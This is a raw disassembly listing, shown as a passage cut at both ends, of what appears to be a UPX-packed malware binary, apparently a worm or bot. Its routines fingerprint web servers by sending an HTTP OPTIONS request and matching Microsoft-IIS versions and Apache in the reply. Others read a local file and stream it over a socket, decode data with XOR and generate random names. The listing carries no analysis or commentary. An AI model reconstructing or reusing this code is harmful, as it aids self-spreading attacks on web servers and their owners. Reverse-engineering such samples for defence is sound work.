mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jnb short loc_412718
mov eax, [ebp+var_4]
add eax, [ebp+var_18]
mov al, [eax]
xor al, byte ptr [ebp+var_C]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_18]
mov [ecx], al
jmp short loc_4126F4
; ---------------------------------------------------------------------------
loc_412718: ; CODE XREF: sub_4125DF+122�j
mov eax, [ebp+var_14]
add eax, 1Ch
locret_41271E: ; CODE XREF: sub_4125DF+E�j
; sub_4125DF+49�j
leave
retn
sub_4125DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412720 proc near ; CODE XREF: sub_412A3A+C�p
; sub_412BC9+DF�p ...
var_194 = dword ptr -194h
var_190 = dword ptr -190h
var_18C = byte ptr -18Ch
var_E4 = byte ptr -0E4h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_194], eax
and [ebp+var_190], 0
loc_412741: ; CODE XREF: sub_412720:loc_41278A�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_190]
mov [ebp+ecx+var_10], al
mov eax, [ebp+var_190]
inc eax
mov [ebp+var_190], eax
mov eax, [ebp+var_190]
cmp eax, [ebp+var_194]
jnz short loc_41278A
push offset dword_418620
mov eax, [ebp+var_190]
lea eax, [ebp+eax+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_41278C
; ---------------------------------------------------------------------------
loc_41278A: ; CODE XREF: sub_412720+4F�j
jmp short loc_412741
; ---------------------------------------------------------------------------
loc_41278C: ; CODE XREF: sub_412720+68�j
push 17Ch
push offset dword_41CA18
lea eax, [ebp+var_18C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push 17Ch
lea eax, [ebp+var_18C]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
leave
retn
sub_412720 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127D0 proc near ; CODE XREF: sub_412A3A+14D�p
; sub_412BC9+133�p ...
var_24C = byte ptr -24Ch
var_22C = byte ptr -22Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24Ch
cmp ds:dword_41EBEC, 0
jnz loc_4128A0
mov ds:dword_41EBEC, 1
and [ebp+var_20C], 0
jmp short loc_412806
; ---------------------------------------------------------------------------
loc_4127F9: ; CODE XREF: sub_4127D0:loc_41289B�j
mov eax, [ebp+var_20C]
inc eax
mov [ebp+var_20C], eax
loc_412806: ; CODE XREF: sub_4127D0+27�j
mov eax, [ebp+var_20C]
imul eax, 0Ch
cmp ds:off_41DB18[eax], 0
jz loc_4128A0
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push ds:off_41DB18[eax]
lea eax, [ebp+var_22C]
push eax
call sub_407A56
add esp, 0Ch
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push ds:off_41CBA0[eax]
lea eax, [ebp+var_24C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_22C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_22C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_41289B
mov ds:dword_41EBF0, 1
jmp short loc_4128A0
; ---------------------------------------------------------------------------
loc_41289B: ; CODE XREF: sub_4127D0+BD�j
jmp loc_4127F9
; ---------------------------------------------------------------------------
loc_4128A0: ; CODE XREF: sub_4127D0+10�j
; sub_4127D0+46�j ...
cmp ds:dword_41EBF0, 0
jz short loc_4128AE
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128AE: ; CODE XREF: sub_4127D0+D7�j
push offset aRb ; "rb"
push offset dword_41ED10
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4128CC
xor eax, eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128CC: ; CODE XREF: sub_4127D0+F6�j
and [ebp+var_4], 0
loc_4128D0: ; CODE XREF: sub_4127D0+145�j
push [ebp+var_8]
push 200h
push 1
lea eax, [ebp+var_208]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412900
push [ebp+var_8]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_412900: ; CODE XREF: sub_4127D0+120�j
push [ebp+var_4]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
jmp short loc_4128D0
; ---------------------------------------------------------------------------
locret_412917: ; CODE XREF: sub_4127D0+DC�j
; sub_4127D0+FA�j ...
leave
retn
sub_4127D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412919 proc near ; CODE XREF: sub_412BC9+E8�p
; sub_412D56+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412938
xor eax, eax
jmp short locret_41294C
; ---------------------------------------------------------------------------
loc_412938: ; CODE XREF: sub_412919+19�j
push 0
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov eax, [ebp+var_4]
locret_41294C: ; CODE XREF: sub_412919+1D�j
leave
retn
sub_412919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41294E proc near ; CODE XREF: sub_412BC9+115�p
; sub_412D56+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_412964
; ---------------------------------------------------------------------------
loc_41295D: ; CODE XREF: sub_41294E:loc_4129C3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_412964: ; CODE XREF: sub_41294E+D�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp ds:off_41CDAE[eax], 0
jz short loc_4129C5
mov eax, [ebp+var_8]
imul eax, 3Ah
mov eax, ds:dword_41CDA6[eax]
cmp eax, [ebp+arg_0]
jnz short loc_4129C3
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CD80
mov [ebp+var_4], eax
push 3Ah
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
push [ebp+arg_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
call sub_4105FB
pop ecx
mov eax, [ebp+arg_4]
add eax, 13h
push eax
call sub_4105FB
pop ecx
jmp short loc_4129C5
; ---------------------------------------------------------------------------
loc_4129C3: ; CODE XREF: sub_41294E+34�j
jmp short loc_41295D
; ---------------------------------------------------------------------------
loc_4129C5: ; CODE XREF: sub_41294E+23�j
; sub_41294E+73�j
mov eax, [ebp+var_4]
leave
retn
sub_41294E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4129CA proc near ; CODE XREF: sub_412A3A+16B�p
; sub_412BC9+15A�p ...
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 104h
push 1
mov eax, [ebp+arg_0]
add eax, 2Ah
push eax
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_104], eax
lea eax, [ebp+var_100]
push eax
push [ebp+arg_8]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_412A11
push offset aUnknown ; "unknown"
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_412A11: ; CODE XREF: sub_4129CA+32�j
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_104]
inc eax
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push offset dword_41A1D0
push offset dword_41DB88
call sub_40D4AB
add esp, 18h
leave
retn
sub_4129CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A3A proc near ; CODE XREF: sub_41331E+148�p
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_235 = byte ptr -235h
var_222 = dword ptr -222h
var_20C = dword ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push [ebp+arg_4]
call sub_412720
pop ecx
push 3Ah
push [ebp+arg_0]
lea eax, [ebp+var_248]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_248]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_235]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_20C+3]
mov [ebp+var_8], eax
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
and [ebp+var_4], 0
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A9F: ; CODE XREF: sub_412A3A+8A�j
; sub_412A3A:loc_412B7F�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412AA6: ; CODE XREF: sub_412A3A+63�j
cmp [ebp+var_4], 3Ch
jnz short loc_412AB1
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AB1: ; CODE XREF: sub_412A3A+70�j
push 3E8h
push [ebp+arg_4]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412AC6
jmp short loc_412A9F
; ---------------------------------------------------------------------------
loc_412AC6: ; CODE XREF: sub_412A3A+88�j
push 200h
push [ebp+var_8]
push [ebp+arg_4]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0FFFFFFFFh
jnz short loc_412AED
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AED: ; CODE XREF: sub_412A3A+AC�j
cmp [ebp+var_24C], 0
jz short loc_412B69
and [ebp+var_250], 0
jmp short loc_412B0C
; ---------------------------------------------------------------------------
loc_412AFF: ; CODE XREF: sub_412A3A:loc_412B34�j
mov eax, [ebp+var_250]
inc eax
mov [ebp+var_250], eax
loc_412B0C: ; CODE XREF: sub_412A3A+C3�j
mov eax, [ebp+var_250]
cmp eax, [ebp+var_24C]
jnb short loc_412B36
mov eax, [ebp+var_250]
mov eax, [ebp+eax+var_20C]
cmp eax, [ebp+var_222]
jnz short loc_412B34
jmp loc_412BC5
; ---------------------------------------------------------------------------
loc_412B34: ; CODE XREF: sub_412A3A+F3�j
jmp short loc_412AFF
; ---------------------------------------------------------------------------
loc_412B36: ; CODE XREF: sub_412A3A+DE�j
push 3
mov eax, [ebp+var_24C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 200h
push 0
push [ebp+var_8]
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_412B7F
; ---------------------------------------------------------------------------
loc_412B69: ; CODE XREF: sub_412A3A+BA�j
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_412B7F: ; CODE XREF: sub_412A3A+12D�j
jmp loc_412A9F
; ---------------------------------------------------------------------------
loc_412B84: ; CODE XREF: sub_412A3A:loc_412BC5�j
push [ebp+arg_4]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412B93
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412B93: ; CODE XREF: sub_412A3A+155�j
push offset dword_41CD14
push [ebp+arg_4]
lea eax, [ebp+var_248]
push eax
push [ebp+arg_0]
call sub_4129CA
add esp, 10h
push 1
push [ebp+arg_4]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412BC5: ; CODE XREF: sub_412A3A+F5�j
jmp short loc_412B84
; ---------------------------------------------------------------------------
locret_412BC7: ; CODE XREF: sub_412A3A+72�j
; sub_412A3A+AE�j ...
leave
retn
sub_412A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BC9 proc near ; CODE XREF: sub_41331E+165�p
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = byte ptr -84Ch
var_810 = dword ptr -810h
var_80C = dword ptr -80Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 85Ch
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_404FE7
add esp, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_854], 3Ch
and [ebp+var_850], 0
and [ebp+var_810], 0
loc_412BFD: ; CODE XREF: sub_412BC9+A9�j
and [ebp+var_85C], 0
jmp short loc_412C13
; ---------------------------------------------------------------------------
loc_412C06: ; CODE XREF: sub_412BC9:loc_412C35�j
mov eax, [ebp+var_85C]
inc eax
mov [ebp+var_85C], eax
loc_412C13: ; CODE XREF: sub_412BC9+3B�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnb short loc_412C37
mov eax, [ebp+var_85C]
mov eax, [ebp+eax*4+var_80C]
cmp eax, [ebp+var_8]
jnz short loc_412C35
jmp short loc_412C37
; ---------------------------------------------------------------------------
loc_412C35: ; CODE XREF: sub_412BC9+68�j
jmp short loc_412C06
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412BC9+56�j
; sub_412BC9+6A�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnz short loc_412C6E
cmp [ebp+var_810], 200h
jnb short loc_412C6E
mov eax, [ebp+var_85C]
mov ecx, [ebp+var_8]
mov [ebp+eax*4+var_80C], ecx
mov eax, [ebp+var_810]
inc eax
mov [ebp+var_810], eax
loc_412C6E: ; CODE XREF: sub_412BC9+7A�j
; sub_412BC9+86�j
xor eax, eax
test eax, eax
jnz short loc_412BFD
lea eax, [ebp+var_854]
push eax
push 0
lea eax, [ebp+var_810]
push eax
push 0
push 0
call ds:dword_41722C ; select
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_412CA5
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp locret_412D4A
; ---------------------------------------------------------------------------
loc_412CA5: ; CODE XREF: sub_412BC9+CC�j
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_858], eax
cmp [ebp+var_858], 0
jnz short loc_412CD1
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CD1: ; CODE XREF: sub_412BC9+FB�j
lea eax, [ebp+var_84C]
push eax
push [ebp+var_858]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412CF9
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CF9: ; CODE XREF: sub_412BC9+123�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412D11
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412D11: ; CODE XREF: sub_412BC9+13B�j
push offset dword_41CD18
push [ebp+var_8]
lea eax, [ebp+var_84C]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
locret_412D4A: ; CODE XREF: sub_412BC9+D7�j
; sub_412BC9+106�j ...
leave
retn
sub_412BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D4C proc near ; CODE XREF: sub_41331E:loc_413420�p
push ebp
mov ebp, esp
mov eax, offset dword_41EBF4
pop ebp
retn
sub_412D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D56 proc near ; DATA XREF: sub_412E04+CA�o
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jnz short loc_412D8A
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412D8A: ; CODE XREF: sub_412D56+25�j
lea eax, [ebp+var_44]
push eax
push [ebp+var_48]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412DAE
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DAE: ; CODE XREF: sub_412D56+49�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412DC8
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DC8: ; CODE XREF: sub_412D56+63�j
push offset dword_41CD1C
push [ebp+var_8]
lea eax, [ebp+var_44]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
locret_412E00: ; CODE XREF: sub_412D56+32�j
; sub_412D56+56�j ...
leave
retn 4
sub_412D56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E04 proc near ; DATA XREF: sub_412F07+B0�o
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_1AA = byte ptr -1AAh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B8h
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_1B4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1B0]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412E59
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_412F03
; ---------------------------------------------------------------------------
loc_412E59: ; CODE XREF: sub_412E04+40�j
lea eax, [ebp+var_1B0]
push eax
mov eax, [ebp+var_1B4]
push dword ptr [eax]
push offset dword_41CD20
lea eax, [ebp+var_1AA]
push eax
call sub_40D53F
add esp, 10h
lea eax, [ebp+var_1B0]
push eax
push offset dword_41EBF4
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_412E8F: ; CODE XREF: sub_412E04+B7�j
; sub_412E04:loc_412EEA�j
mov eax, [ebp+var_1B4]
cmp dword ptr [eax+4], 0
jz short loc_412E9D
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412E9D: ; CODE XREF: sub_412E04+95�j
push 3E8h
push [ebp+var_4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1B8], eax
cmp [ebp+var_1B8], 0FFFFFFFFh
jnz short loc_412EBD
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EBD: ; CODE XREF: sub_412E04+B5�j
cmp [ebp+var_1B8], 0
jnz short loc_412EC8
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412EC8: ; CODE XREF: sub_412E04+C0�j
push [ebp+var_1B8]
push offset sub_412D56
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_412EEA
push [ebp+var_1B8]
call sub_4053B1
pop ecx
loc_412EEA: ; CODE XREF: sub_412E04+D8�j
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EEC: ; CODE XREF: sub_412E04+97�j
; sub_412E04+C2�j
push [ebp+var_4]
call sub_404CBB
pop ecx
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
locret_412F03: ; CODE XREF: sub_412E04+50�j
leave
retn 4
sub_412E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F07 proc near ; CODE XREF: sub_40A9CF+F6E�p
; sub_41349C+2C7�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_412F26
jmp locret_412FC4
; ---------------------------------------------------------------------------
loc_412F26: ; CODE XREF: sub_412F07+18�j
cmp [ebp+arg_4], 0
jz short loc_412F3A
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
jmp short loc_412F4E
; ---------------------------------------------------------------------------
loc_412F3A: ; CODE XREF: sub_412F07+23�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_412F4E: ; CODE XREF: sub_412F07+31�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_412F63
cmp [ebp+var_4], 0FFFFh
jbe short loc_412F77
loc_412F63: ; CODE XREF: sub_412F07+51�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_412F77: ; CODE XREF: sub_412F07+5A�j
push 0Ah
mov eax, [ebp+var_8]
add eax, 4
push eax
push [ebp+var_4]
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_4]
push offset dword_41CD58
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_412E04
call sub_4095A4
add esp, 14h
locret_412FC4: ; CODE XREF: sub_412F07+1A�j
leave
retn
sub_412F07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FC6 proc near ; CODE XREF: UPX0:004168CB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_412FD8
; ---------------------------------------------------------------------------
loc_412FD1: ; CODE XREF: sub_412FC6:loc_413088�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412FD8: ; CODE XREF: sub_412FC6+9�j
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp ds:off_41CDAE[eax], 0
jz locret_41308D
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ecx, ds:dword_41CDA6[ecx]
and ecx, 0FFh
mov eax, ds:off_41CDAE[eax]
sub eax, ecx
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ds:off_41CDAE[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
and ds:dword_41CDAA[eax], 0
loc_413024: ; CODE XREF: sub_412FC6+7E�j
; sub_412FC6+BE�j
call sub_410422
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ds:dword_41CDA6[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp ds:dword_41CDA6[eax], 0
jnz short loc_413046
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413046: ; CODE XREF: sub_412FC6+7C�j
and [ebp+var_8], 0
jmp short loc_413053
; ---------------------------------------------------------------------------
loc_41304C: ; CODE XREF: sub_412FC6:loc_413086�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_413053: ; CODE XREF: sub_412FC6+84�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp ds:off_41CDAE[eax], 0
jz short loc_413088
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jz short loc_413086
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_8]
imul ecx, 3Ah
mov eax, ds:dword_41CDA6[eax]
cmp eax, ds:dword_41CDA6[ecx]
jnz short loc_413086
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: sub_412FC6+A2�j
; sub_412FC6+BC�j
jmp short loc_41304C
; ---------------------------------------------------------------------------
loc_413088: ; CODE XREF: sub_412FC6+9A�j
jmp loc_412FD1
; ---------------------------------------------------------------------------
locret_41308D: ; CODE XREF: sub_412FC6+1F�j
leave
retn
sub_412FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41308F proc near ; CODE XREF: sub_41331E+72�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 820h
push 16h
push offset aOptionsHttp1_0 ; "OPTIONS / HTTP/1.0\r\n\r\n"
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_4130C4
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130C4: ; CODE XREF: sub_41308F+2C�j
push 0
push 800h
lea eax, [ebp+var_810]
push eax
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4130F3
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4130F3
cmp [ebp+var_8], 800h
jnz short loc_4130FA
loc_4130F3: ; CODE XREF: sub_41308F+53�j
; sub_41308F+59�j
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130FA: ; CODE XREF: sub_41308F+62�j
mov eax, [ebp+var_8]
and [ebp+eax+var_810], 0
and [ebp+var_4], 0
push offset aServer ; "Server:"
lea eax, [ebp+var_810]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_41312C
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41312C: ; CODE XREF: sub_41308F+94�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+var_10]
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413150
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413150: ; CODE XREF: sub_41308F+B8�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413173
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413173: ; CODE XREF: sub_41308F+DB�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
push 0Dh
push offset aMicrosoftIis ; "Microsoft-IIS"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41323C
and [ebp+var_818], 0
and [ebp+var_814], 0
lea eax, [ebp+var_814]
push eax
lea eax, [ebp+var_818]
push eax
push offset aMicrosoftIisU_ ; "Microsoft-IIS/%u.%u"
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 10h
cmp [ebp+var_818], 4
jnz short loc_4131E9
cmp [ebp+var_814], 0
jnz short loc_4131E9
push 4
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4131E9: ; CODE XREF: sub_41308F+147�j
; sub_41308F+150�j
cmp [ebp+var_818], 5
jnz short loc_413203
cmp [ebp+var_814], 0
jnz short loc_413203
push 3
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413203: ; CODE XREF: sub_41308F+161�j
; sub_41308F+16A�j
cmp [ebp+var_818], 5
jnz short loc_41321D
cmp [ebp+var_814], 5
jnz short loc_41321D
push 2
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41321D: ; CODE XREF: sub_41308F+17B�j
; sub_41308F+184�j
cmp [ebp+var_818], 6
jnz short loc_413237
cmp [ebp+var_814], 0
jnz short loc_413237
push 1
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413237: ; CODE XREF: sub_41308F+195�j
; sub_41308F+19E�j
jmp loc_41331A
; ---------------------------------------------------------------------------
loc_41323C: ; CODE XREF: sub_41308F+10E�j
cmp [ebp+var_C], 0
jz loc_41331A
push 6
push offset aApache ; "Apache"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41331A
and [ebp+var_820], 0
lea eax, [ebp+var_820]
push eax
